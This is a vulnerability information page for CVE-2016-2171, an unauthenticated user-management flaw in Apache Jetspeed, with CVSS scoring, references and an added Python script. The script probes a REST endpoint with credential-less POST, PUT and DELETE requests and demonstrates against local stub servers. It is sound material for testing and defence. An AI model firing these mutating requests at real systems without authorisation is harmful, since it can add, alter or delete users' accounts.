CVE-2016-2171 Information

Description

The User Manager service in Apache Jetspeed before 2.3.1 does not properly restrict access using Jetspeed Security, which allows remote attackers to (1) add, (2) edit, or (3) delete users via the REST API without authenticating.
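The check a practitioner wants for this class of flaw is simple: send the mutating user-management requests with no credentials and see whether the server answers 2xx (anonymous callers can change the user store) or 401/403 (access is enforced). The script below is an added example, not Jetspeed project code and not taken from the references above. The endpoint path /jetspeed/services/usermanager/users/<name> is an assumption used only for illustration; set BASE_PATH to the real endpoint of the deployment under test. The two in-process HTTP servers are constructed stand-ins for an unpatched and a patched instance, so the script runs offline.

```python
"""Probe whether a user-management REST endpoint accepts unauthenticated
mutating requests, the failure mode described for CVE-2016-2171.

Added example, not Apache Jetspeed code. BASE_PATH is an ASSUMPTION for
illustration only; the two handlers below are constructed stand-ins.
"""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed endpoint layout; replace with the real path of the target deployment.
BASE_PATH = "/jetspeed/services/usermanager/users"


def probe_user_mutation(base_url, username, timeout=5):
    """Send POST/PUT/DELETE for `username` with no credentials at all.

    Returns a dict {"POST": status, "PUT": status, "DELETE": status}.
    Any 2xx means an anonymous client may add/edit/delete users; a
    hardened deployment answers 401 or 403 to every one of them."""
    results = {}
    for method in ("POST", "PUT", "DELETE"):
        req = urllib.request.Request(
            f"{base_url}{BASE_PATH}/{username}",
            data=None if method == "DELETE" else b"",
            method=method,
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[method] = resp.status
        except urllib.error.HTTPError as err:
            results[method] = err.code   # 401/403 is the expected answer
    return results


def is_vulnerable(results):
    """True if any unauthenticated mutating request was accepted."""
    return any(200 <= code < 300 for code in results.values())


class _UserManagerStub(BaseHTTPRequestHandler):
    """Constructed stand-in for the user manager REST service."""
    require_auth = False

    def _handle(self):
        if self.require_auth and not self.headers.get("Authorization"):
            # Hardened behaviour: refuse before touching the user store.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Jetspeed"')
            self.end_headers()
            return
        self.rfile.read(int(self.headers.get("Content-Length") or 0))
        self.send_response(200)   # "user stored/removed" without any check
        self.end_headers()

    do_POST = do_PUT = do_DELETE = _handle

    def log_message(self, *args):   # keep the demo quiet
        pass


class VulnerableHandler(_UserManagerStub):
    require_auth = False          # pre-2.3.1 behaviour: no access control


class HardenedHandler(_UserManagerStub):
    require_auth = True           # access restricted to authenticated callers


def _serve(handler):
    srv = HTTPServer(("127.0.0.1", 0), handler)   # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo():
    """Probe both stand-ins; returns {name: (status_by_method, vulnerable?)}."""
    out = {}
    for name, handler in (("vulnerable", VulnerableHandler),
                          ("hardened", HardenedHandler)):
        srv = _serve(handler)
        try:
            results = probe_user_mutation(
                f"http://127.0.0.1:{srv.server_port}", "probe_user")
            out[name] = (results, is_vulnerable(results))
        finally:
            srv.shutdown()
            srv.server_close()
    return out


if __name__ == "__main__":
    for name, (results, vuln) in run_demo().items():
        print(f"{name}: {results} -> {'VULNERABLE' if vuln else 'ok'}")
```

Against a real instance, call probe_user_mutation with the site's base URL and a throwaway username; because the probe is itself a mutating request, run it only against systems you are authorised to test, and delete the probe user afterwards if the server accepted it.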

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Reference

http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and
http://mail-archives.apache.org/mod_mbox/portals-jetspeed-user/201603.mbox/%3CB9165E38-F3D8-496D-8642-8A53FCAC736A%40gmail.com%3E
https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-2171

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction Required

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

Base Score

7.5

Base Severity

HIGH
